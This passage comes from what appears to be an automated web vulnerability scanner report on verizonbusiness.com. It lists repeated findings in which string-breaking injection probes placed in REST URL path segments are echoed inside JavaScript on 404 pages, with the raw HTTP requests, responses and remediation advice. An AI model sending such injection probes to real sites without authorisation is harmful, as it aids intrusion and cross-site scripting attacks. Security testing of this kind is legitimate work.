Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about5b651';c37bef9bb91/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.spl
...[SNIP]...

1.412. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6437d"%3bb9fb186b039 was submitted in the REST URL parameter 1. This input was echoed as 6437d";b9fb186b039 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about6437d"%3bb9fb186b039/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about6437d";b9fb186b039/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="f
...[SNIP]...

1.413. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3160e"%3b7113b4969d4 was submitted in the REST URL parameter 2. This input was echoed as 3160e";7113b4969d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news3160e"%3b7113b4969d4/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47347
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news3160e";7113b4969d4/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";
...[SNIP]...

1.414. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57aad'%3b29a1793f5e5 was submitted in the REST URL parameter 2. This input was echoed as 57aad';29a1793f5e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news57aad'%3b29a1793f5e5/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47347
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news57aad';29a1793f5e5/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/
...[SNIP]...

1.415. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6d6a"%3b7a5cfc53ed6 was submitted in the REST URL parameter 3. This input was echoed as c6d6a";7a5cfc53ed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c6d6a"%3b7a5cfc53ed6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/c6d6a";7a5cfc53ed6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.416. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7ac'%3b0587a951e92 was submitted in the REST URL parameter 3. This input was echoed as 8c7ac';0587a951e92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/8c7ac'%3b0587a951e92 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/8c7ac';0587a951e92'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.417. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9ee3'%3b471c41df3eb was submitted in the REST URL parameter 1. This input was echoed as c9ee3';471c41df3eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutc9ee3'%3b471c41df3eb/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:50 GMT
Content-Type: text/html
Content-Length: 40830
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutc9ee3';471c41df3eb/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();

...[SNIP]...

1.418. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7080e"%3b6baa27dd355 was submitted in the REST URL parameter 1. This input was echoed as 7080e";6baa27dd355 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about7080e"%3b6baa27dd355/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40828
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about7080e";6baa27dd355/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEG
...[SNIP]...

1.419. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75000"%3b428c04d0e31 was submitted in the REST URL parameter 2. This input was echoed as 75000";428c04d0e31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news75000"%3b428c04d0e31/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news75000";428c04d0e31/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY


...[SNIP]...

1.420. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6df4'%3b9c92eac496b was submitted in the REST URL parameter 2. This input was echoed as a6df4';9c92eac496b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsa6df4'%3b9c92eac496b/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:50:23 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsa6df4';9c92eac496b/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i
...[SNIP]...

1.421. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3146a"%3bb8d31905349 was submitted in the REST URL parameter 3. This input was echoed as 3146a";b8d31905349 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/3146a"%3bb8d31905349 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/3146a";b8d31905349";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.422. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94da5'%3b3530f120cba was submitted in the REST URL parameter 3. This input was echoed as 94da5';3530f120cba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/94da5'%3b3530f120cba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:13 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:13 GMT

